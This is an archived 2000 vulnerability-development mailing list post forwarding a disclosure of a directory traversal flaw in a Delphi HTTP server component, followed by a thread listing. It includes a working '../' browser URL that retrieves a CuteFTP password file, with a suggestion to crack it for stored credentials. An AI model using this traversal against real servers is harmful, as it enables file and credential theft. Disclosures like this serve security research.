Vulnerability Development mailing list archives
Fwd: [Newssubmission: Security vulnerability in the ICS HTTPServer component]
From: webmaster () TLSECURITY NET (TLsecurity.net)
Date: Sun, 14 May 2000 14:37:55 EDT
Int_13h http://www.TLSecurity.net I thought I forward this over to the List : http://www.TLSecurity.net <STRONG>attached mail follows:</STRONG><HR NOSHADE><P> Hi, There's a security vulnerability in the Delphi Internet Component Suite's HTTP server. ( http://www.rtfm.be/fpiette/indexuk.htm) These components are widly spread. The vender has been notified of the flaw. Vulnerability description: The vulnerability let's a person download _any_ file on the HTTPServer's computer using a simple exploit that can be used directly from any internet browser. Exploit: Name: Good old dot-dot exploit... - Set the HTTP root to 'c:\httproot' and launch the server - Start your browser and type http://server/../Program%20Files/CuteFTP/smdata.dat Download the file and crack it You now have all passwords stored in the victims CuteFTP client. Note: CuteFTP is just a sample, it could be any program that stores passwords. Darkstar dark_star () altavista net http://browse.to/Darkstar
Current thread:
- Re: QPOP2.5* exploit ??, (continued)
- Re: QPOP2.5* exploit ?? typo () INFERNO TUSCULUM EDU (May 14)
- Re: QPOP2.5* exploit ?? Dimitry Andric (May 14)
- Re: QPOP2.5* exploit ?? Martin Ixter (May 14)
- TROJAN WARNING: Re: QPOP2.5* exploit ?? Nic Bellamy (May 14)
- Re: QPOP2.5* exploit ?? phi-vulndev () EXORSUS NET (May 14)
- Bubble Boy Virus Spreading Mechanism Andrew Leong (May 15)
- Re: QPOP2.5* exploit ?? Lluis Mora (May 15)
- Bugtraq Stats for the last 3 years available now. Alfred Huger (May 15)
- xsoldier mandrake exploit. egid=games with the right shellcode Larry C$ (May 15)
- Re: QPOP2.5* exploit ?? rpc (May 14)
- Fwd: [Newssubmission: Security vulnerability in the ICS HTTPServer component] TLsecurity.net (May 14)
- Re: regarding phrack49's stack smashing tutorial Pavel Kankovsky (May 14)
- Re: regarding phrack49's stack smashing tutorial Darshan Patil (May 14)
- Re: WSCRIPT.EXE , CSCRIPT.EXE replacement for *.vbs Richard Rager (May 13)
- is: tcp/ip vuln, not?... was: WSCRIPT.EXE , CSCRIPT.EXE replacement for *.vbs Bluefish (May 13)
- Re: is: tcp/ip vuln, not?... was: WSCRIPT.EXE ,CSCRIPT.EXE replacement for *.vbs Crispin Cowan (May 15)
- Re: is: tcp/ip vuln, not?... was: WSCRIPT.EXE ,CSCRIPT.EXE replacement for *.vbs Jason Legate (May 17)
- Re: WSCRIPT.EXE , CSCRIPT.EXE replacement for *.vbs Richard Rager (May 13)